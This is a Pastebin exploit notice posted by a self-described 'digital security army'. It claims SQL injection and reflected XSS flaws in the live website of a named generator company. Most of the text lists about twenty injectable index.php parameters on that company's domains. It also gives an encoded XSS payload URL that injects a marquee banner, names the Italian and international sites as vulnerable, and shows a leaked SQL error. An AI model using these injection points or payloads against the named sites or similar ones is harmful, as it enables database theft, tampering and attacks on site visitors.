KingSkrupellos

Coelmo Generating Sets Company XSS SQL Injection

Sep 1st, 2019
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.24 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Coelmo Generating Sets Company XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/09/2019
  7. # Vendor Homepage : coelmo.net
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. Coelmo Generating Sets is prone to an SQL-injection vulnerability because it fails to sufficiently
  24. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  25. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  26. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  27. application and execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using
  29. a browser or with any SQL Injector Tool.
  30.  
  31. Reflected XSS (or Non-Persistent) :
  32. ***************************************
  33. The server reads data directly from the HTTP request and reflects it back in the HTTP response.
  34. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
  35. to a vulnerable web application, which is then reflected back to the victim and executed by
  36. the web browser. The most common mechanism for delivering malicious content is to include
  37. it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs
  38. constructed in this manner constitute the core of many phishing schemes, whereby an attacker
  39. convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's
  40. content back to the victim, the content is executed by the victim's browser.
  41.  
  42. ###################################################################
  43.  
  44. # SQL Injection Exploit :
  45. **********************
  46. /index.php?section=contacts&subsection=[SQL Injection]
  47.  
  48. /index.php?section=applications&subsection=industrial&brand=[SQL Injection]
  49.  
  50. /index.php?section=applications&subsection=industrial&id=[SQL Injection]
  51.  
  52. /index.php?section=applications&subsection=residential_and_commercial&id=[SQL Injection]
  53.  
  54. /index.php?section=applications&subsection=leisure_marine&id=[SQL Injection]
  55.  
  56. /index.php?section=applications&subsection=rent&id=[SQL Injection]
  57.  
  58. /index.php?section=applications&subsection=work_sites&id=[SQL Injection]
  59.  
  60. /index.php?section=products&subsection=generating_sets&id=[SQL Injection]
  61.  
  62. /index.php?section=products&subsection=marine_generating_sets&id=[SQL Injection]
  63.  
  64. /index.php?section=products&subsection=light_towers&id=[SQL Injection]
  65.  
  66. /index.php?section=products&subsection=welding_machines&id=[SQL Injection]
  67.  
  68. /index.php?section=company&subsection=multimedia&subsubsection=calendar&year=[SQL Injection]
  69.  
  70. /index.php?section=prodotti&subsection=gruppi_elettrogeni&id=[SQL Injection]
  71.  
  72. /index.php?section=applicazioni&subsection=cantiere&id=[SQL Injection]
  73.  
  74. /index.php?section=applicazioni&subsection=nautica_da_diporto&id=[SQL Injection]
  75.  
  76. /index.php?section=applicazioni&subsection=industriali&id=[SQL Injection]
  77.  
  78. /index.php?section=applicazioni&subsection=noleggio&id=[SQL Injection]
  79.  
  80. /index.php?section=prodotti&subsection=torri_faro&id=[SQL Injection]
  81.  
  82. /index.php?section=prodotti&subsection=motosaldatrici&id=[SQL Injection]
  83.  
  84. /index.php?section=prodotti&subsection=generatori_marini&id=[SQL Injection]
  85.  
  86. /index.php?section=prodotti&subsection=generatori_marini_commerciali&subsubsection=[SQL Injection]
  87.  
  88. /index.php?section=azienda&subsection=multimedia&subsubsection=calendario&year=[SQL Injection]
  89.  
  90. # Cross Site Scripting XSS Exploit :
  91. ********************************
  92. /index.php?section=applications&subsection=industrial&brand=1%27%3Cmarquee
  93. %3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-
  94. KingSkrupellos%3C/font%3E%3C/marquee%3E
  95.  
  96. ###################################################################
  97.  
  98. # Example Vulnerable Sites :
  99. *************************
  100. [+] coelmo.net/index.php?section=applications&subsection=industrial&brand=1%27
  101.  
  102. [+] coelmo.it/index.php?section=applications&subsection=industrial&brand=1%27
  103.  
  104. ###################################################################
  105.  
  106. # Example SQL Database Error :
  107. ****************************
  108. Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation:
  109. 1064 You have an error in your SQL syntax; check the manual that corresponds to your
  110. MySQL server version for the right syntax to use near ''' at line 25
  111.  
  112. ###################################################################
  113.  
  114. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  115.  
  116. ###################################################################
Add Comment
Please, Sign In to add comment